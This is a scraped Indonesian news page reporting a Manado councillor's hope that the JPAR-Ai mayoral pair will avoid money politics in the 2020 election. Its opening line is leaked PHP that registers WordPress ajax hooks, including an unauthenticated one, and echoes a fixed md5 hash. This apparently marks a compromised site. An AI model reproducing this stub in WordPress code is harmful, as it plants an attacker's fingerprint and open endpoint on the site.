function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Jurani Rurubua: Saya Berharap JPAR-Ai Tidak Lakukan Money Politik – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

MANADO · 5 Sep 2020 17:44 WIB ·

Jurani Rurubua: Saya Berharap JPAR-Ai Tidak Lakukan Money Politik


					Jurani Rurubua S.ST Perbesar

Jurani Rurubua S.ST

Jurani Rurubua

MANADO – Anggota DPRD Kota Manado, Jurani Rurubua, memberikan pernyataan terkait dukungan Partai Solidaritas Indonesia (PSI) terhadap pasangan Julyeta Paulina Amelia Runtuwene (JPAR) dan Harley Mangindaan (Ai) saat melakukan pendaftaran di kantor KPU Kota Manado, Sabtu (5/9/2020).

“Saya hadir disini untuk dukungan partai PSI kepada pasangan JPAR-Ai untuk Pilkada Kota Manado. Namun, banyak harapan saya untuk pasangan ini jika terpilih sebagai wali kota dan wakil wali kota nanti,” kata Jurani di sela-sela pendaftaran paslon JPAR-Ai.

Jurani mengatakan, dia menginginkan paslon JPAR-Ai ketika terpilih, harus menerapkan transparansi anggaran dan tidak melakukan money politik untuk meraup suara.

“Saya berharap pasangan JPAR-Ai tidak melakukan money politik untuk meraup suara masyarakat. Biarkan masyarakat yang menilai dengan hati nurani,” katanya.

Untuk itu, Jurani yang mewakili salah satu partai pengusung untuk JPAR-Ai, agar dalam tahap kampanye bakal paslon untuk memenangkan hati masyarakat lewat kinerja nyata.

“Tidak boleh melakukan hal-hal yang curang. Karena masih ada masyarakat yang punya hati nurani untuk memilih,” kata Jurani Rurubua (AuddyManoppo)

Artikel ini telah dibaca 3 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Pemkot Manado Rolling Jabatan Kepsek dan Pengawas, Wawali Sualang: Tetap Fokus Bekerja

20 Maret 2024 - 15:30 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Pemkot Manado Rolling Jabatan Pegawai Eselon III dan IV

5 Maret 2024 - 17:23 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Trending di Uncategorized